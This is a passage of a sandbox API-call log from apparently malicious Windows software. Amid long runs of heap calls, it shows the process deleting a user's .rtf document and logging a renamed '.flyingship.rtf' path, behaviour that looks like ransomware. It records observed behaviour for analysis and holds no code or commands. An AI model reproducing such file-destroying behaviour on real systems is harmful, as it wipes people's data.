RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0179.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.933] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0179.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0179.934] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.934] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ynsvrvaq.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0179.935] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.935] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.935] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0179.935] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.935] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.935] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.937] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.937] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.937] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.937] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.937] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.937] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0179.937] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.937] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.938] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.938] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.938] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.938] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.938] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", lpFilePart=0x0) returned 0x44 [0179.940] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6682b0, ftCreationTime.dwHighDateTime=0x1d5e6a8, ftLastAccessTime.dwLowDateTime=0x8ad0cf40, ftLastAccessTime.dwHighDateTime=0x1d5d902, ftLastWriteTime.dwLowDateTime=0x1084ee20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1084f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="YNSVRvaq.rtf", cAlternateFileName="")) returned 0x90af58 [0179.941] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ynsvrvaq.rtf")) returned 1 [0179.944] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6682b0, ftCreationTime.dwHighDateTime=0x1d5e6a8, ftLastAccessTime.dwLowDateTime=0x8ad0cf40, ftLastAccessTime.dwHighDateTime=0x1d5d902, ftLastWriteTime.dwLowDateTime=0x1084ee20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1084f, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="YNSVRvaq.rtf", cAlternateFileName="")) returned 0 [0179.944] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.944] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.945] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.945] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.945] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.945] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.945] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.945] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.945] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.945] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.947] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.947] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0179.947] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.947] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.947] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0179.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.948] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0179.948] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1be3, lpOverlapped=0x0) returned 1 [0179.948] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0179.948] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1be3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.948] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0179.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.flyingship.rtf\r\n", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0179.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x52) returned 0x8c4a48 [0179.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.flyingship.rtf\r\n", cchWideChar=82, lpMultiByteStr=0x8c4a48, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.flyingship.rtf\r\n", lpUsedDefaultChar=0x0) returned 82 [0179.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0179.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0179.949] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x51, lpOverlapped=0x0) returned 1 [0179.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0179.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.949] CloseHandle (hObject=0x120) returned 1 [0179.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0179.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0179.957] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0179.957] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0179.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.959] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0179.959] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.959] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.959] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0179.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.959] RtlAllocateHeap (HeapHandle=0x8a0000, 